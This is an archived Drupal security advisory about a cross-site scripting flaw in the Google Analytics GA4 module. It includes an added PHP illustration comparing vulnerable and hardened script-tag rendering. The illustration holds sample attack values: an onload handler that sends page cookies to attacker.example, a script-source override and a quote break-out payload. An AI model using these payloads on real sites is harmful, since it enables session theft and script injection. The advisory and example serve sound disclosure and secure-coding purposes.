it-securitynotifies AT lists.piratenpartei.de
Subject: Security announcements
List archive
[IT-SecNots] [Security-news] Google Analytics GA4 - Moderately critical - Cross-site Scripting - SA-CONTRIB-2026-024
- From: security-news AT drupal.org
- To: security-news AT drupal.org
- Subject: [IT-SecNots] [Security-news] Google Analytics GA4 - Moderately critical - Cross-site Scripting - SA-CONTRIB-2026-024
- Date: Wed, 4 Mar 2026 17:59:52 +0000
- Archived-at: <https://lists.drupal.org/mailman3/hyperkitty/list/security-news AT drupal.org/message/254JUTQLDTXGFYTZGDELWC5XNPASVFSI/>
- Authentication-results: lists.piratenpartei.de; dkim=pass header.d=drupal.org header.s=default header.b=TVB1ettk; dkim=fail ("body hash did not verify") header.d=drupal.org header.s=f34odw3mfzgsrgyn3evjayysxxl6jizn header.b="Ai5/3X4r"; dkim=fail ("body hash did not verify") header.d=amazonses.com header.s=gdwg2y3kokkkj5a55z2ilkup5wp5hhxx header.b="pR/99Jl/"; dmarc=pass (policy=none) header.from=drupal.org; spf=pass (lists.piratenpartei.de: domain of security-news-bounces AT drupal.org designates 2605:bc80:3010::133 as permitted sender) smtp.mailfrom=security-news-bounces AT drupal.org
- List-archive: <https://lists.drupal.org/mailman3/hyperkitty/list/security-news AT drupal.org/>
- List-id: <security-news.drupal.org>
View online: https://www.drupal.org/sa-contrib-2026-024
Project: Google Analytics GA4 [1]
Date: 2026-March-04
Security risk: *Moderately critical* 12 ∕ 25
AC:Basic/A:Admin/CI:Some/II:Some/E:Theoretical/TD:Default [2]
Vulnerability: Cross-site Scripting
Affected versions: <1.1.13
CVE IDs: CVE-2026-3529
Description:
The Google Analytics GA4 module enables users to add custom attributes to the
script tag used to load the Google Analytics library. The module does not
sufficiently sanitize these attributes.
This vulnerability is mitigated by the fact that an attacker must have a role
with the "ga4 configure" (or "administer google analytics ga4 settings")
permission.
An attacker with this permission could inject malicious JavaScript via event
handlers (such as onload) or override the script source, leading to a
Cross-Site Scripting (XSS) attack on all pages where the GA4 script is
loaded.
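The following PHP is an added illustration of the attribute-injection pattern the advisory describes; it is not code from the ga4_google_analytics module or from the 1.1.13 fix. The renderer functions, the attribute allow-list, the measurement-ID pattern and the attacker-controlled settings array are all assumptions made for the example. It contrasts a renderer that interpolates configured attributes verbatim with one that allow-lists attribute names, rejects event handlers and src overrides, and escapes values.

```php
<?php
declare(strict_types=1);

// Added example, not the module's code. Everything below (function names,
// allow-list, ID pattern, sample attacker input) is assumed for illustration.

const GA4_LOADER = 'https://www.googletagmanager.com/gtag/js?id=';

/**
 * Vulnerable pattern: every configured name/value pair is written into the
 * <script> tag as-is. Whoever holds the "ga4 configure" permission controls
 * $attributes, so an onload handler reaches the browser on every page that
 * loads the tracker. Custom attributes are placed before src here (assumed
 * placement); under the HTML parser's duplicate-attribute rule the first
 * occurrence wins, which is how a configured src overrides the real loader.
 */
function render_script_tag_vulnerable(string $measurementId, array $attributes): string
{
    $attr = '';
    foreach ($attributes as $name => $value) {
        $attr .= ' ' . $name . '="' . $value . '"';
    }
    return '<script async' . $attr . ' src="' . GA4_LOADER . $measurementId . '"></script>';
}

/**
 * Hardened pattern (assumed allow-list, not the module's actual fix):
 *  - attribute names must be on a strict allow-list (plus plain data-* names),
 *    so onload, onerror, src and similar are dropped before rendering;
 *  - names are lower-cased first so "OnLoad" cannot bypass the check;
 *  - values are HTML-escaped with ENT_QUOTES so a value such as
 *    abc" onerror="alert(1) cannot close the quoted attribute;
 *  - the measurement ID is constrained to the G-XXXX shape so it cannot carry
 *    a quote or whitespace into the src URL.
 */
function render_script_tag_hardened(string $measurementId, array $attributes): string
{
    static $allowed = ['nonce', 'crossorigin', 'integrity', 'referrerpolicy', 'type'];

    if (!preg_match('/^G-[A-Z0-9]{1,20}$/', $measurementId)) {
        throw new InvalidArgumentException('Invalid GA4 measurement ID');
    }

    $attr = '';
    foreach ($attributes as $name => $value) {
        $name = strtolower((string) $name);
        $isData = (bool) preg_match('/^data-[a-z0-9-]+$/', $name);
        if (!$isData && !in_array($name, $allowed, true)) {
            continue; // drop anything not explicitly allowed, including on* handlers and src
        }
        $escaped = htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $attr .= ' ' . $name . '="' . $escaped . '"';
    }
    // src is always emitted by the renderer itself and never taken from config.
    return '<script async src="' . GA4_LOADER . $measurementId . '"' . $attr . '></script>';
}

// Constructed attacker-controlled configuration, as a user with the
// "ga4 configure" permission could save it through the settings form.
$malicious = [
    'onload' => 'fetch("https://attacker.example/?c=" + document.cookie)',
    'src'    => 'https://attacker.example/evil.js',
    'nonce'  => 'abc" onerror="alert(1)',
];

echo render_script_tag_vulnerable('G-ABC123', $malicious), PHP_EOL;
echo render_script_tag_hardened('G-ABC123', $malicious), PHP_EOL;
```

Running the script prints the vulnerable tag with the onload handler, the attacker's src and a break-out onerror attribute intact, and the hardened tag with only an escaped nonce attribute left, the rest silently dropped. Dropping unknown attributes rather than escaping their names is the safer choice here: escaping keeps the name "onload" valid, while an allow-list removes the whole class of event-handler attributes.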
Solution:
Install the latest version:
* If you use the Google Analytics GA4 module, upgrade to Google Analytics
GA4 1.1.13 [3]
Reported By:
* Pierre Rudloff (prudloff) [4] provisional member of the Drupal Security
Team
Fixed By:
* Sujan Shrestha (sujan shrestha) [5]
Coordinated By:
* Greg Knaddison (greggles) [6] of the Drupal Security Team
* Juraj Nemec (poker10) [7] of the Drupal Security Team
------------------------------------------------------------------------------
Contribution record [8]
[1] https://www.drupal.org/project/ga4_google_analytics
[2] https://www.drupal.org/security-team/risk-levels
[3] https://www.drupal.org/project/ga4_google_analytics/releases/1.1.13
[4] https://www.drupal.org/u/prudloff
[5] https://www.drupal.org/u/sujan-shrestha
[6] https://www.drupal.org/u/greggles
[7] https://www.drupal.org/u/poker10
[8] https://new.drupal.org/contribution-record?source_link=https%3A//www.drupal.org/node/3577070
_______________________________________________
Security-news mailing list -- security-news AT drupal.org
To unsubscribe send an email to security-news-leave AT drupal.org
Unsubscribe at
Archive provided by MHonArc 2.6.19+.